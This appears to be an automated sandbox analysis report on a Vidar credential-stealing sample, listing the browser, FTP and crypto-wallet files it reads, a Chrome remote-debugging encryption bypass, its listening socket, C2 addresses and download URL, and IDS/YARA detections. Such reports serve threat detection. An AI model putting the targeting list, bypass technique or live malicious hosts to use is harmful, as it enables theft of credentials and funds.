Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\bookmarkbackups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\temporary\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\security_state\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\2023-10\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\to-be-removed\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.files\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\crashes\events\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\archived\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\sessionstore-backups\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\default\key4.db	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Exodus\backups\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\MultiDoge\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

OS version to string mapping found (often used in BOTs)

Source: Inf.com	Binary or memory string: WIN_81
Source: Inf.com	Binary or memory string: WIN_XP
Source: Inf.com.7.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]\|%%\|%[-+ 0#]?([0-9]\|\)?(\.[0-9]\|\.\)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: Inf.com	Binary or memory string: WIN_XPe
Source: Inf.com	Binary or memory string: WIN_VISTA
Source: Inf.com	Binary or memory string: WIN_7
Source: Inf.com	Binary or memory string: WIN_8

Yara detected Credential Stealer

Source: Yara match	File source: 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"

Yara detected Vidar stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: 18.2.Inf.com.390000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001A33000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351564901.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351446315.0000000004BF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351511068.0000000004A7C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351416495.00000000019F0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3022504782.0000000004BF0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3019523263.0000000000391000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000003.2351644907.0000000001A58000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.3021593436.0000000001960000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Inf.com PID: 8144, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00922263 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		18_2_00922263
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00921C61 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		18_2_00921C61

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
149.154.167.99	t.me	United Kingdom	62041	TELEGRAMRU	false
5.252.155.64	unknown	Russian Federation	49981	WORLDSTREAMNL	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
172.217.21.36	www.google.com	United States	15169	GOOGLEUS	false
188.245.216.205	bijutr.shop	Iran (ISLAMIC Republic Of)	16322	PARSONLINETehran-IRANIR	true

Private

IP
192.168.2.4
127.0.0.1

Contacted Domains

Name	IP	Active
bijutr.shop	188.245.216.205	true
t.me	149.154.167.99	true
www.google.com	172.217.21.36	true
sAOREpcgcodbdSPJ.sAOREpcgcodbdSPJ	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://5.252.155.64/lem.exe	false	Avira URL Cloud: malware	unknown

AV Detection

Antivirus detection for URL or domain

Source: http://5.252.155.64/lem.exe	Avira URL Cloud: Label: malware
Source: https://bijutr.shop/e3	Avira URL Cloud: Label: malware
Source: http://5.252.155.64/lem.exe;	Avira URL Cloud: Label: malware
Source: https://bijutr.shop/op	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000012.00000003.2351615242.00000000019D9000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199809363512", "Botnet": "m0nk3"}

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.6% probability

Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49754 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.245.216.205:443 -> 192.168.2.4:49760 version: TLS 1.2

Source:	Binary string: cryptosetup.pdbGCTL source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr
Source:	Binary string: cryptosetup.pdb source: Inf.com, 00000012.00000002.3022504782.0000000004CAC000.00000004.00000800.00020000.00000000.sdmp, Q9R1NG.18.dr

Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406301 FindFirstFileW,FindClose,	5_2_00406301
Source: C:\Users\user\AppData\Local\Temp\putt.exe	Code function: 5_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	5_2_00406CC7
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090DC54 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090DC54
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A087 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A087
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A1E2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	18_2_0091A1E2
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090E472 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	18_2_0090E472
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0091A570 FindFirstFileW,Sleep,FindNextFileW,FindClose,	18_2_0091A570
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009166DC FindFirstFileW,FindNextFileW,FindClose,	18_2_009166DC
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_008DC622 FindFirstFileExW,	18_2_008DC622
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_009173D4 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	18_2_009173D4
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_00917333 FindFirstFileW,FindClose,	18_2_00917333
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com	Code function: 18_2_0090D921 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	18_2_0090D921

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 8MB later: 41MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.4:49781 -> 188.245.216.205:443
Source: Network traffic	Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.4:49769 -> 188.245.216.205:443
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 188.245.216.205:443 -> 192.168.2.4:49781
Source: Network traffic	Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 188.245.216.205:443 -> 192.168.2.4:49786

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: https://steamcommunity.com/profiles/76561199809363512

Downloads executable code via HTTP

Source: global traffic

HTTP GET or POST without a user agent

Source: global traffic

HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View	IP Address: 239.255.255.250 239.255.255.250

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: PARSONLINETehran-IRANIR PARSONLINETehran-IRANIR

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Suricata IDS alerts with low severity for network traffic

Source: Network traffic

Suricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.4:49730 -> 5.252.155.64:80

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64
Source: unknown	TCP traffic detected without corresponding DNS query: 5.252.155.64

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\105235\Inf.com

Code function: 18_2_0091D889 InternetReadFile,SetEvent,GetLastError,SetEvent,

18_2_0091D889

Source: global traffic	HTTP traffic detected: GET /k04ael HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0Host: bijutr.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/ddljson?async=ntp:2 HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiWocsBCJz+zAEIhaDNAQjcvc0BCI/KzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /lem.exe HTTP/1.1Accept: /Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 5.252.155.64Connection: Keep-Alive

Source: chrome.exe, 00000015.00000003.2553200870.00000ED800F0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2553133305.00000ED800F84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000015.00000003.2553448830.00000ED8003B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: const FACEBOOK_APP_ID=738026486351791;class DoodleShareDialogElement extends PolymerElement{static get is(){return"ntp-doodle-share-dialog"}static get template(){return getTemplate$3()}static get properties(){return{title:String,url:Object}}onFacebookClick_(){const url="https://www.facebook.com/dialog/share"+`?app_id=${FACEBOOK_APP_ID}`+`&href=${encodeURIComponent(this.url.url)}`+`&hashtag=${encodeURIComponent("#GoogleDoodle")}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kFacebook)}onTwitterClick_(){const url="https://twitter.com/intent/tweet"+`?text=${encodeURIComponent(`${this.title}\n${this.url.url}`)}`;WindowProxy.getInstance().open(url);this.notifyShare_(DoodleShareChannel.kTwitter)}onEmailClick_(){const url=`mailto:?subject=${encodeURIComponent(this.title)}`+`&body=${encodeURIComponent(this.url.url)}`;WindowProxy.getInstance().navigate(url);this.notifyShare_(DoodleShareChannel.kEmail)}onCopyClick_(){this.$.url.select();navigator.clipboard.writeText(this.url.url);this.notifyShare_(DoodleShareChannel.kLinkCopy)}onCloseClick_(){this.$.dialog.close()}notifyShare_(channel){this.dispatchEvent(new CustomEvent("share",{detail:channel}))}}customElements.define(DoodleShareDialogElement.is,DoodleShareDialogElement);function getTemplate$2(){return html`<!--_html_template_start_--><style include="cr-hidden-style">:host{--ntp-logo-height:200px;display:flex;flex-direction:column;flex-shrink:0;justify-content:flex-end;min-height:var(--ntp-logo-height)}:host([reduced-logo-space-enabled_]){--ntp-logo-height:168px}:host([doodle-boxed_]){justify-content:flex-end}#logo{forced-color-adjust:none;height:92px;width:272px}:host([single-colored]) #logo{-webkit-mask-image:url(icons/google_logo.svg);-webkit-mask-repeat:no-repeat;-webkit-mask-size:100%;background-color:var(--ntp-logo-color)}:host(:not([single-colored])) 